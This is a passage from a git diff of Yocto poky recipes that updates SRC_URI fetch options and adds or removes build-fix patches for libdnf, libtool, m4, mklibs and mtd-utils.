= "github.com/golang/dep" -SRC_URI = "git://${GO_IMPORT} \ +SRC_URI = "git://${GO_IMPORT};branch=master \ file://0001-Add-support-for-mips-mips64.patch;patchdir=src/github.com/golang/dep \ file://0001-bolt_riscv64-Add-support-for-riscv64.patch;patchdir=src/github.com/golang/dep \ " diff --git a/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb b/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb index 58d2dee897..d9e712f74a 100644 --- a/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb +++ b/poky/meta/recipes-devtools/libcomps/libcomps_0.1.15.bb @@ -4,7 +4,7 @@ DESCRIPTION = "Libcomps is alternative for yum.comps library. It's written in pu LICENSE = "GPLv2" LIC_FILES_CHKSUM = "file://COPYING;md5=b234ee4d69f5fce4486a80fdaf4a4263" -SRC_URI = "git://github.com/rpm-software-management/libcomps.git \ +SRC_URI = "git://github.com/rpm-software-management/libcomps.git;branch=master;protocol=https \ file://0001-Add-crc32.c-to-sources-list.patch \ file://0002-Do-not-set-PYTHON_INSTALL_DIR-by-running-python.patch \ " diff --git a/poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch b/poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch new file mode 100644 index 0000000000..61d255581b --- /dev/null +++ b/poky/meta/recipes-devtools/libdnf/libdnf/0040-Mark-job-goal.upgrade-with-sltr-as-target.patch @@ -0,0 +1,58 @@ +From b4c5a3312287f31a2075a235db846ff611586d2c Mon Sep 17 00:00:00 2001 +From: Jaroslav Mracek +Date: Tue, 3 Sep 2019 11:01:23 +0200 +Subject: [PATCH] Mark job goal.upgrade with sltr as targeted + +It allows to keep installed packages in upgrade set. + +It also prevents from reinstalling of modified packages with same NEVRA. + + +Backport commit b4c5a3312287f31a2075a235db846ff611586d2c from +https://github.com/rpm-software-management/libdnf + +This bug is present in oe-core's dnf + +Remove changes to spec file from upstream + +Upstream-Status: Backport +Signed-off-by: Jate Sujjavanich +--- + libdnf.spec | 4 ++-- + libdnf/goal/Goal.cpp | 2 +- + libdnf/goal/Goal.hpp | 6 ++++-- + 3 files changed, 7 insertions(+), 5 deletions(-) + +diff --git a/libdnf/goal/Goal.cpp b/libdnf/goal/Goal.cpp +index b69be19..a38cbb4 100644 +--- a/libdnf/goal/Goal.cpp ++++ b/libdnf/goal/Goal.cpp +@@ -767,7 +767,7 @@ void + Goal::upgrade(HySelector sltr) + { + pImpl->actions = static_cast(pImpl->actions | DNF_UPGRADE); +- sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE); ++ sltrToJob(sltr, &pImpl->staging, SOLVER_UPDATE|SOLVER_TARGETED); + } + + void +diff --git a/libdnf/goal/Goal.hpp b/libdnf/goal/Goal.hpp +index f33dfa2..d701317 100644 +--- a/libdnf/goal/Goal.hpp ++++ b/libdnf/goal/Goal.hpp +@@ -86,8 +86,10 @@ public: + /** + * @brief If selector ill formed, it rises std::runtime_error() + * +- * @param sltr p_sltr: It should contain only upgrades with obsoletes otherwise it can try to +- * reinstall installonly packages. ++ * @param sltr p_sltr: It contains upgrade-to packages and obsoletes. The presence of installed ++ * packages prevents reinstalling packages with the same NEVRA but changed contant. To honor repo ++ * priority all relevant packages must be present. To upgrade package foo from priority repo, all ++ * installed and available packages of the foo must be in selector plus obsoletes of foo. + */ + void upgrade(HySelector sltr); + void userInstalled(DnfPackage *pkg); +-- +2.7.4 + diff --git a/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb b/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb index cc7f2be564..39858ad401 100644 --- a/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb +++ b/poky/meta/recipes-devtools/libdnf/libdnf_0.28.1.bb @@ -4,13 +4,14 @@ DESCRIPTION = "This library provides a high level package-manager. It's core lib LICENSE = "LGPLv2.1+" LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" -SRC_URI = "git://github.com/rpm-software-management/libdnf \ +SRC_URI = "git://github.com/rpm-software-management/libdnf;branch=master;protocol=https \ file://0001-FindGtkDoc.cmake-drop-the-requirement-for-GTKDOC_SCA.patch \ file://0004-Set-libsolv-variables-with-pkg-config-cmake-s-own-mo.patch \ file://0001-Get-parameters-for-both-libsolv-and-libsolvext-libdn.patch \ file://0001-Add-WITH_TESTS-option.patch \ file://0001-include-stdexcept-for-runtime_error.patch \ file://fix-deprecation-warning.patch \ + file://0040-Mark-job-goal.upgrade-with-sltr-as-target.patch \ " SRCREV = "751f89045b80d58c0d05800f74357cf78cdf7e77" diff --git a/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb b/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb index a299514340..73a58f75e3 100644 --- a/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb +++ b/poky/meta/recipes-devtools/librepo/librepo_1.11.2.bb @@ -5,7 +5,7 @@ DESCRIPTION = "${SUMMARY}" LICENSE = "LGPLv2.1" LIC_FILES_CHKSUM = "file://COPYING;md5=4fbd65380cdd255951079008b364516c" -SRC_URI = "git://github.com/rpm-software-management/librepo.git \ +SRC_URI = "git://github.com/rpm-software-management/librepo.git;branch=master;protocol=https \ file://0002-Do-not-try-to-obtain-PYTHON_INSTALL_DIR-by-running-p.patch \ file://0004-Set-gpgme-variables-with-pkg-config-not-with-cmake-m.patch \ file://CVE-2020-14352.patch \ diff --git a/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc b/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc index e9225e140c..c8744e6d5f 100644 --- a/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc +++ b/poky/meta/recipes-devtools/libtool/libtool-2.4.6.inc @@ -23,6 +23,8 @@ SRC_URI = "${GNU_MIRROR}/libtool/libtool-${PV}.tar.gz \ file://0001-libtool-Check-for-static-libs-for-internal-compiler-.patch \ file://0001-Makefile.am-make-sure-autoheader-run-before-autoconf.patch \ file://0001-Makefile.am-make-sure-autoheader-run-before-automake.patch \ + file://lto-prefix.patch \ + file://debian-no_hostname.patch \ " SRC_URI[md5sum] = "addf44b646ddb4e3919805aa88fa7c5e" diff --git a/poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch b/poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch new file mode 100644 index 0000000000..2bd010b8e4 --- /dev/null +++ b/poky/meta/recipes-devtools/libtool/libtool/lto-prefix.patch @@ -0,0 +1,22 @@ +If lto is enabled, we need the prefix-map variables to be passed to the linker. +Add these to the list of options libtool passes through. + +Upstream-Status: Pending +Signed-off-by: Richard Purdie + +Index: libtool-2.4.6/build-aux/ltmain.in +=================================================================== +--- libtool-2.4.6.orig/build-aux/ltmain.in ++++ libtool-2.4.6/build-aux/ltmain.in +@@ -5424,9 +5424,10 @@ func_mode_link () + # --sysroot=* for sysroot support + # -O*, -g*, -flto*, -fwhopr*, -fuse-linker-plugin GCC link-time optimization + # -stdlib=* select c++ std lib with clang ++ # -f*-prefix-map* needed for lto linking + -64|-mips[0-9]|-r[0-9][0-9]*|-xarch=*|-xtarget=*|+DA*|+DD*|-q*|-m*| \ + -t[45]*|-txscale*|-p|-pg|--coverage|-fprofile-*|-F*|@*|-tp=*|--sysroot=*| \ +- -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*) ++ -O*|-g*|-flto*|-fwhopr*|-fuse-linker-plugin|-fstack-protector*|-stdlib=*|-f*-prefix-map*) + func_quote_for_eval "$arg" + arg=$func_quote_for_eval_result + func_append compile_command " $arg" diff --git a/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb b/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb index a5715faaa9..f5fdd00e5e 100644 --- a/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb +++ b/poky/meta/recipes-devtools/libtool/libtool_2.4.6.bb @@ -1,6 +1,6 @@ require libtool-${PV}.inc -SRC_URI += "file://multilib.patch file://debian-no_hostname.patch" +SRC_URI += "file://multilib.patch" RDEPENDS_${PN} += "bash" diff --git a/poky/meta/recipes-devtools/llvm/llvm_git.bb b/poky/meta/recipes-devtools/llvm/llvm_git.bb index 534e2c685f..de92cef1a4 100644 --- a/poky/meta/recipes-devtools/llvm/llvm_git.bb +++ b/poky/meta/recipes-devtools/llvm/llvm_git.bb @@ -30,7 +30,7 @@ LLVM_DIR = "llvm${LLVM_RELEASE}" BRANCH = "release/${MAJOR_VERSION}.x" SRCREV = "c1a0a213378a458fbea1a5c77b315c7dce08fd05" -SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH} \ +SRC_URI = "git://github.com/llvm/llvm-project.git;branch=${BRANCH};protocol=https \ file://0006-llvm-TargetLibraryInfo-Undefine-libc-functions-if-th.patch;striplevel=2 \ file://0007-llvm-allow-env-override-of-exe-path.patch;striplevel=2 \ file://0001-AsmMatcherEmitter-sort-ClassInfo-lists-by-name-as-we.patch;striplevel=2 \ diff --git a/poky/meta/recipes-devtools/m4/m4-1.4.18.inc b/poky/meta/recipes-devtools/m4/m4-1.4.18.inc index a9b63c1bf6..6475b02f8b 100644 --- a/poky/meta/recipes-devtools/m4/m4-1.4.18.inc +++ b/poky/meta/recipes-devtools/m4/m4-1.4.18.inc @@ -9,6 +9,7 @@ inherit autotools texinfo ptest SRC_URI = "${GNU_MIRROR}/m4/m4-${PV}.tar.gz \ file://ac_config_links.patch \ file://m4-1.4.18-glibc-change-work-around.patch \ + file://0001-c-stack-stop-using-SIGSTKSZ.patch \ " SRC_URI_append_class-target = " file://0001-Unset-need_charset_alias-when-building-for-musl.patch \ file://run-ptest \ diff --git a/poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch b/poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch new file mode 100644 index 0000000000..883b8a2075 --- /dev/null +++ b/poky/meta/recipes-devtools/m4/m4/0001-c-stack-stop-using-SIGSTKSZ.patch @@ -0,0 +1,84 @@ +From 69238f15129f35eb4756ad8e2004e0d7907cb175 Mon Sep 17 00:00:00 2001 +From: Khem Raj +Date: Fri, 30 Apr 2021 17:40:36 -0700 +Subject: [PATCH] c-stack: stop using SIGSTKSZ + +This patch is required with glibc 2.34+ +based on gnulib [1] + +[1] https://git.savannah.gnu.org/cgit/gnulib.git/commit/?id=f9e2b20a12a230efa30f1d479563ae07d276a94b + +Upstream-Status: Pending +Signed-off-by: Khem Raj +--- + lib/c-stack.c | 22 +++++++++++++--------- + 1 file changed, 13 insertions(+), 9 deletions(-) + +diff --git a/lib/c-stack.c b/lib/c-stack.c +index 5353c08..863f764 100644 +--- a/lib/c-stack.c ++++ b/lib/c-stack.c +@@ -51,13 +51,14 @@ + typedef struct sigaltstack stack_t; + #endif + #ifndef SIGSTKSZ +-# define SIGSTKSZ 16384 +-#elif HAVE_LIBSIGSEGV && SIGSTKSZ < 16384 ++#define get_sigstksz() (16384) ++#elif HAVE_LIBSIGSEGV + /* libsigsegv 2.6 through 2.8 have a bug where some architectures use + more than the Linux default of an 8k alternate stack when deciding + if a fault was caused by stack overflow. */ +-# undef SIGSTKSZ +-# define SIGSTKSZ 16384 ++#define get_sigstksz() ((SIGSTKSZ) < 16384 ? 16384 : (SIGSTKSZ)) ++#else ++#define get_sigstksz() ((SIGSTKSZ)) + #endif + + #include +@@ -131,7 +132,8 @@ die (int signo) + /* Storage for the alternate signal stack. */ + static union + { +- char buffer[SIGSTKSZ]; ++ /* allocate buffer with size from get_sigstksz() */ ++ char *buffer; + + /* These other members are for proper alignment. There's no + standard way to guarantee stack alignment, but this seems enough +@@ -203,10 +205,11 @@ c_stack_action (void (*action) (int)) + program_error_message = _("program error"); + stack_overflow_message = _("stack overflow"); + ++ alternate_signal_stack.buffer = malloc(get_sigstksz()); + /* Always install the overflow handler. */ + if (stackoverflow_install_handler (overflow_handler, + alternate_signal_stack.buffer, +- sizeof alternate_signal_stack.buffer)) ++ get_sigstksz())) + { + errno = ENOTSUP; + return -1; +@@ -279,14 +282,15 @@ c_stack_action (void (*action) (int)) + stack_t st; + struct sigaction act; + st.ss_flags = 0; ++ alternate_signal_stack.buffer = malloc(get_sigstksz()); + # if SIGALTSTACK_SS_REVERSED + /* Irix mistakenly treats ss_sp as the upper bound, rather than + lower bound, of the alternate stack. */ +- st.ss_sp = alternate_signal_stack.buffer + SIGSTKSZ - sizeof (void *); +- st.ss_size = sizeof alternate_signal_stack.buffer - sizeof (void *); ++ st.ss_sp = alternate_signal_stack.buffer + get_sigstksz() - sizeof (void *); ++ st.ss_size = get_sigstksz() - sizeof (void *); + # else + st.ss_sp = alternate_signal_stack.buffer; +- st.ss_size = sizeof alternate_signal_stack.buffer; ++ st.ss_size = get_sigstksz(); + # endif + r = sigaltstack (&st, NULL); + if (r != 0) +-- +2.31.1 + diff --git a/poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch b/poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch new file mode 100644 index 0000000000..f96cc7d302 --- /dev/null +++ b/poky/meta/recipes-devtools/mklibs/files/remove-deprecated-exception-specification-cpp17.patch @@ -0,0 +1,431 @@ +From 597c7a8333df84a87cc48fb8477b603ffbf372a6 Mon Sep 17 00:00:00 2001 +From: Andrej Valek +Date: Mon, 23 Aug 2021 12:45:11 +0200 +Subject: [PATCH] feat(cpp17): remove deprecated exception specifications for + C++ 17 + +Upstream-Status: Submitted [https://salsa.debian.org/installer-team/mklibs/-/merge_requests/2] + +based on: http://www.open-std.org/jtc1/sc22/wg21/docs/papers/2016/p0003r5.html + +Signed-off-by: Andrej Valek +--- + src/mklibs-readelf/elf.cpp | 48 ++++++++++++++++++++--------------------- + src/mklibs-readelf/elf.hpp | 18 ++++++++-------- + src/mklibs-readelf/elf_data.hpp | 36 +++++++++++++++---------------- + 3 files changed, 51 insertions(+), 51 deletions(-) + +diff --git a/src/mklibs-readelf/elf.cpp b/src/mklibs-readelf/elf.cpp +index 0e4c0f3..2e6d0f6 100644 +--- a/src/mklibs-readelf/elf.cpp ++++ b/src/mklibs-readelf/elf.cpp +@@ -36,7 +36,7 @@ file::~file () throw () + delete *it; + } + +-file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_error) ++file *file::open (const char *filename) throw () + { + struct stat buf; + int fd; +@@ -72,7 +72,7 @@ file *file::open (const char *filename) throw (std::bad_alloc, std::runtime_erro + } + + template +-file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error) ++file *file::open_class(uint8_t *mem, size_t len) throw () + { + switch (mem[EI_DATA]) + { +@@ -86,7 +86,7 @@ file *file::open_class(uint8_t *mem, size_t len) throw (std::bad_alloc, std::run + } + + template +-file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw (std::bad_alloc, std::runtime_error) ++file_data<_class, _data>::file_data(uint8_t *mem, size_t len) throw () + : file(mem, len) + { + if (mem[EI_CLASS] != _class::id) +@@ -190,7 +190,7 @@ section_data<_class, _data>::section_data(Shdr *shdr, uint8_t *mem) throw () + } + + template +-void section_data<_class, _data>::update(const file &file) throw (std::bad_alloc) ++void section_data<_class, _data>::update(const file &file) throw () + { + const section_type §ion = + dynamic_cast &>(file.get_section(file.get_shstrndx())); +@@ -204,7 +204,7 @@ section_type::~section_type() throw () + } + + template +-section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data>(header, mem) + { + if (this->type != SHT_DYNAMIC) +@@ -221,7 +221,7 @@ section_real<_class, _data, section_type_DYNAMIC>::section_real(Shdr *header, ui + } + + template +-void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_DYNAMIC>::update(const file &file) throw () + { + section_data<_class, _data>::update(file); + +@@ -243,7 +243,7 @@ section_type::~section_type() throw () + } + + template +-section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data>(header, mem) + { + if (this->type != SHT_DYNSYM) +@@ -260,7 +260,7 @@ section_real<_class, _data, section_type_DYNSYM>::section_real(Shdr *header, uin + } + + template +-void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_DYNSYM>::update(const file &file) throw () + { + section_data<_class, _data>::update (file); + +@@ -285,7 +285,7 @@ const version_definition *section_type::get_version_def + } + + template +-section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data>(header, mem) + { + if (this->type != SHT_GNU_verdef) +@@ -307,7 +307,7 @@ section_real<_class, _data, section_type_GNU_VERDEF>::section_real(Shdr *header, + } + + template +-void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_GNU_VERDEF>::update(const file &file) throw () + { + section_data<_class, _data>::update(file); + +@@ -333,7 +333,7 @@ const version_requirement_entry *section_type::get_ver + + template + section_real<_class, _data, section_type_GNU_VERNEED>:: +-section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real(Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data> (header, mem) + { + if (this->type != SHT_GNU_verneed) +@@ -355,7 +355,7 @@ section_real(Shdr *header, uint8_t *mem) throw (std::bad_alloc) + } + + template +-void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw (std::bad_alloc) ++void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &file) throw () + { + section_data<_class, _data>::update(file); + +@@ -372,7 +372,7 @@ void section_real<_class, _data, section_type_GNU_VERNEED>::update(const file &f + + template + section_real<_class, _data, section_type_GNU_VERSYM>:: +-section_real (Shdr *header, uint8_t *mem) throw (std::bad_alloc) ++section_real (Shdr *header, uint8_t *mem) throw () + : section_data<_class, _data> (header, mem) + { + if (this->type != SHT_GNU_versym) +@@ -399,7 +399,7 @@ segment_data<_class, _data>::segment_data (Phdr *phdr, uint8_t *mem) throw () + } + + template +-segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw (std::bad_alloc) ++segment_real<_class, _data, segment_type_INTERP>::segment_real (Phdr *header, uint8_t *mem) throw () + : segment_data<_class, _data> (header, mem) + { + if (this->type != PT_INTERP) +@@ -429,13 +429,13 @@ dynamic_data<_class, _data>::dynamic_data (Dyn *dyn) throw () + } + + template +-void dynamic_data<_class, _data>::update_string(const section_type §ion) throw (std::bad_alloc) ++void dynamic_data<_class, _data>::update_string(const section_type §ion) throw () + { + if (is_string) + val_string = section.get_string(val); + } + +-std::string symbol::get_version () const throw (std::bad_alloc) ++std::string symbol::get_version () const throw () + { + if (verneed) + return verneed->get_name(); +@@ -445,7 +445,7 @@ std::string symbol::get_version () const throw (std::bad_alloc) + return "Base"; + } + +-std::string symbol::get_version_file () const throw (std::bad_alloc) ++std::string symbol::get_version_file () const throw () + { + if (verneed) + return verneed->get_file(); +@@ -453,7 +453,7 @@ std::string symbol::get_version_file () const throw (std::bad_alloc) + return "None"; + } + +-std::string symbol::get_name_version () const throw (std::bad_alloc) ++std::string symbol::get_name_version () const throw () + { + std::string ver; + +@@ -478,13 +478,13 @@ symbol_data<_class, _data>::symbol_data (Sym *sym) throw () + } + + template +-void symbol_data<_class, _data>::update_string(const section_type §ion) throw (std::bad_alloc) ++void symbol_data<_class, _data>::update_string(const section_type §ion) throw () + { + name_string = section.get_string(name); + } + + template +-void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw (std::bad_alloc) ++void symbol_data<_class, _data>::update_version(const file &file, uint16_t index) throw () + { + if (!file.get_section_GNU_VERSYM()) + return; +@@ -531,13 +531,13 @@ version_definition_data<_class, _data>::version_definition_data (Verdef *verdef) + } + + template +-void version_definition_data<_class, _data>::update_string(const section_type §ion) throw (std::bad_alloc) ++void version_definition_data<_class, _data>::update_string(const section_type §ion) throw () + { + for (std::vector::iterator it = names.begin(); it != names.end(); ++it) + names_string.push_back(section.get_string(*it)); + } + +-version_requirement::version_requirement() throw (std::bad_alloc) ++version_requirement::version_requirement() throw () + : file_string("None") + { } + +@@ -561,7 +561,7 @@ version_requirement_data<_class, _data>::version_requirement_data (Verneed *vern + + template + void version_requirement_data<_class, _data>:: +-update_string(const section_type §ion) throw (std::bad_alloc) ++update_string(const section_type §ion) throw () + { + file_string = section.get_string(file); + +@@ -596,7 +596,7 @@ version_requirement_entry_data(Vernaux *vna, const version_requirement &verneed) + + template + void version_requirement_entry_data<_class, _data>:: +-update_string(const section_type §ion) throw (std::bad_alloc) ++update_string(const section_type §ion) throw () + { + name_string = section.get_string(name); + } +diff --git a/src/mklibs-readelf/elf.hpp b/src/mklibs-readelf/elf.hpp +index 70e61cd..afb0c9e 100644 +--- a/src/mklibs-readelf/elf.hpp ++++ b/src/mklibs-readelf/elf.hpp +@@ -49,7 +49,7 @@ namespace Elf + const uint16_t get_shstrndx() const throw () { return shstrndx; } + + const std::vector
get_sections() const throw () { return sections; }; +- const section &get_section(unsigned int i) const throw (std::out_of_range) { return *sections.at(i); }; ++ const section &get_section(unsigned int i) const throw () { return *sections.at(i); }; + const section_type *get_section_DYNAMIC() const throw () { return section_DYNAMIC; }; + const section_type *get_section_DYNSYM() const throw () { return section_DYNSYM; }; + const section_type *get_section_GNU_VERDEF() const throw () { return section_GNU_VERDEF; }; +@@ -59,13 +59,13 @@ namespace Elf + const std::vector get_segments() const throw () { return segments; }; + const segment_type *get_segment_INTERP() const throw () { return segment_INTERP; }; + +- static file *open(const char *filename) throw (std::bad_alloc, std::runtime_error); ++ static file *open(const char *filename) throw (); + + protected: +- file(uint8_t *mem, size_t len) throw (std::bad_alloc) : mem(mem), len(len) { } ++ file(uint8_t *mem, size_t len) throw () : mem(mem), len(len) { } + + template +- static file *open_class(uint8_t *, size_t) throw (std::bad_alloc, std::runtime_error); ++ static file *open_class(uint8_t *, size_t) throw (); + + uint16_t type; + uint16_t machine; +@@ -128,7 +128,7 @@ namespace Elf + class section_type : public virtual section + { + public: +- std::string get_string(uint32_t offset) const throw (std::bad_alloc) ++ std::string get_string(uint32_t offset) const throw () + { + return std::string(reinterpret_cast (mem + offset)); + } +@@ -263,10 +263,10 @@ namespace Elf + uint8_t get_bind () const throw () { return bind; } + uint8_t get_type () const throw () { return type; } + const std::string &get_name_string() const throw () { return name_string; } +- std::string get_version() const throw (std::bad_alloc); +- std::string get_version_file() const throw (std::bad_alloc); ++ std::string get_version() const throw (); ++ std::string get_version_file() const throw (); + uint16_t get_version_data() const throw () { return versym; } +- std::string get_name_version() const throw (std::bad_alloc); ++ std::string get_name_version() const throw (); + + protected: + uint32_t name; +@@ -305,7 +305,7 @@ namespace Elf + class version_requirement + { + public: +- version_requirement() throw (std::bad_alloc); ++ version_requirement() throw (); + virtual ~version_requirement () throw () { } + + const std::string &get_file() const throw () { return file_string; } +diff --git a/src/mklibs-readelf/elf_data.hpp b/src/mklibs-readelf/elf_data.hpp +index 05effee..3871982 100644 +--- a/src/mklibs-readelf/elf_data.hpp ++++ b/src/mklibs-readelf/elf_data.hpp +@@ -94,7 +94,7 @@ namespace Elf + class file_data : public file + { + public: +- file_data(uint8_t *, size_t len) throw (std::bad_alloc, std::runtime_error); ++ file_data(uint8_t *, size_t len) throw (); + + const uint8_t get_class() const throw () { return _class::id; } + const uint8_t get_data() const throw () { return _data::id; } +@@ -109,7 +109,7 @@ namespace Elf + public: + section_data(Shdr *, uint8_t *) throw (); + +- virtual void update(const file &) throw (std::bad_alloc); ++ virtual void update(const file &) throw (); + }; + + template +@@ -133,9 +133,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template +@@ -147,9 +147,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template +@@ -161,9 +161,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template +@@ -175,9 +175,9 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + +- void update(const file &) throw (std::bad_alloc); ++ void update(const file &) throw (); + }; + + template +@@ -189,7 +189,7 @@ namespace Elf + typedef typename _elfdef<_class>::Shdr Shdr; + + public: +- section_real(Shdr *, uint8_t *) throw (std::bad_alloc); ++ section_real(Shdr *, uint8_t *) throw (); + }; + + template +@@ -220,7 +220,7 @@ namespace Elf + typedef typename _elfdef<_class>::Phdr Phdr; + + public: +- segment_real (Phdr *, uint8_t *) throw (std::bad_alloc); ++ segment_real (Phdr *, uint8_t *) throw (); + }; + + template +@@ -232,7 +232,7 @@ namespace Elf + public: + dynamic_data (Dyn *) throw (); + +- void update_string(const section_type &) throw (std::bad_alloc); ++ void update_string(const section_type &) throw (); + }; + + template +@@ -244,8 +244,8 @@ namespace Elf + public: + symbol_data (Sym *) throw (); + +- void update_string(const section_type &) throw (std::bad_alloc); +- virtual void update_version (const file &, uint16_t) throw (std::bad_alloc); ++ void update_string(const section_type &) throw (); ++ virtual void update_version (const file &, uint16_t) throw (); + }; + + template +@@ -257,7 +257,7 @@ namespace Elf + + version_definition_data (Verdef *) throw (); + +- void update_string(const section_type &) throw (std::bad_alloc); ++ void update_string(const section_type &) throw (); + }; + + template +@@ -269,7 +269,7 @@ namespace Elf + + version_requirement_data (Verneed *) throw (); + +- void update_string(const section_type &) throw (std::bad_alloc); ++ void update_string(const section_type &) throw (); + }; + + template +@@ -280,7 +280,7 @@ namespace Elf + + version_requirement_entry_data (Vernaux *, const version_requirement &) throw (); + +- void update_string(const section_type &) throw (std::bad_alloc); ++ void update_string(const section_type &) throw (); + }; + } + +-- +2.11.0 + diff --git a/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb b/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb index 1784af1f4c..07142e57e0 100644 --- a/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb +++ b/poky/meta/recipes-devtools/mklibs/mklibs-native_0.1.44.bb @@ -12,6 +12,7 @@ SRC_URI = "http://snapshot.debian.org/archive/debian/20180828T214102Z/pool/main/ file://avoid-failure-on-symbol-provided-by-application.patch \ file://show-GNU-unique-symbols-as-provided-symbols.patch \ file://fix_cross_compile.patch \ + file://remove-deprecated-exception-specification-cpp17.patch \ " SRC_URI[md5sum] = "6b6eeb9b4016c6a7317acc28c89e32cc" diff --git a/poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch b/poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch deleted file mode 100644 index d43f7e1a7a..0000000000 --- a/poky/meta/recipes-devtools/mtd/mtd-utils/0001-mtd-utils-Fix-return-value-of-ubiformat.patch +++ /dev/null @@ -1,62 +0,0 @@ -From 4d19bffcfd66e25d3ee74536ae2d2da7ad52e8e2 Mon Sep 17 00:00:00 2001 -From: Barry Grussling -Date: Sun, 12 Jan 2020 12:33:32 -0800 -Subject: [PATCH] mtd-utils: Fix return value of ubiformat -Organization: O.S. Systems Software LTDA. - -This changeset fixes a feature regression in ubiformat. Older versions of -ubiformat, when invoked with a flash-image, would return 0 in the case no error -was encountered. Upon upgrading to latest, it was discovered that ubiformat -returned 255 even without encountering an error condition. - -This changeset corrects the above issue and causes ubiformat, when given an -image file, to return 0 when no errors are detected. - -Tested by running through my loading scripts and verifying ubiformat returned -0. - -Upstream-Status: Backport [2.1.2] - -Signed-off-by: Barry Grussling -Signed-off-by: David Oberhollenzer -Signed-off-by: Otavio Salvador ---- - ubi-utils/ubiformat.c | 7 +++++-- - 1 file changed, 5 insertions(+), 2 deletions(-) - -diff --git a/ubi-utils/ubiformat.c b/ubi-utils/ubiformat.c -index a90627c..5377b12 100644 ---- a/ubi-utils/ubiformat.c -+++ b/ubi-utils/ubiformat.c -@@ -550,6 +550,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd, - struct ubi_vtbl_record *vtbl; - int eb1 = -1, eb2 = -1; - long long ec1 = -1, ec2 = -1; -+ int ret = -1; - - write_size = UBI_EC_HDR_SIZE + mtd->subpage_size - 1; - write_size /= mtd->subpage_size; -@@ -643,8 +644,10 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info *mtd, - if (!args.quiet && !args.verbose) - printf("\n"); - -- if (novtbl) -+ if (novtbl) { -+ ret = 0; - goto out_free; -+ } - - if (eb1 == -1 || eb2 == -1) { - errmsg("no eraseblocks for volume table"); -@@ -669,7 +672,7 @@ static int format(libmtd_t libmtd, const struct mtd_dev_info 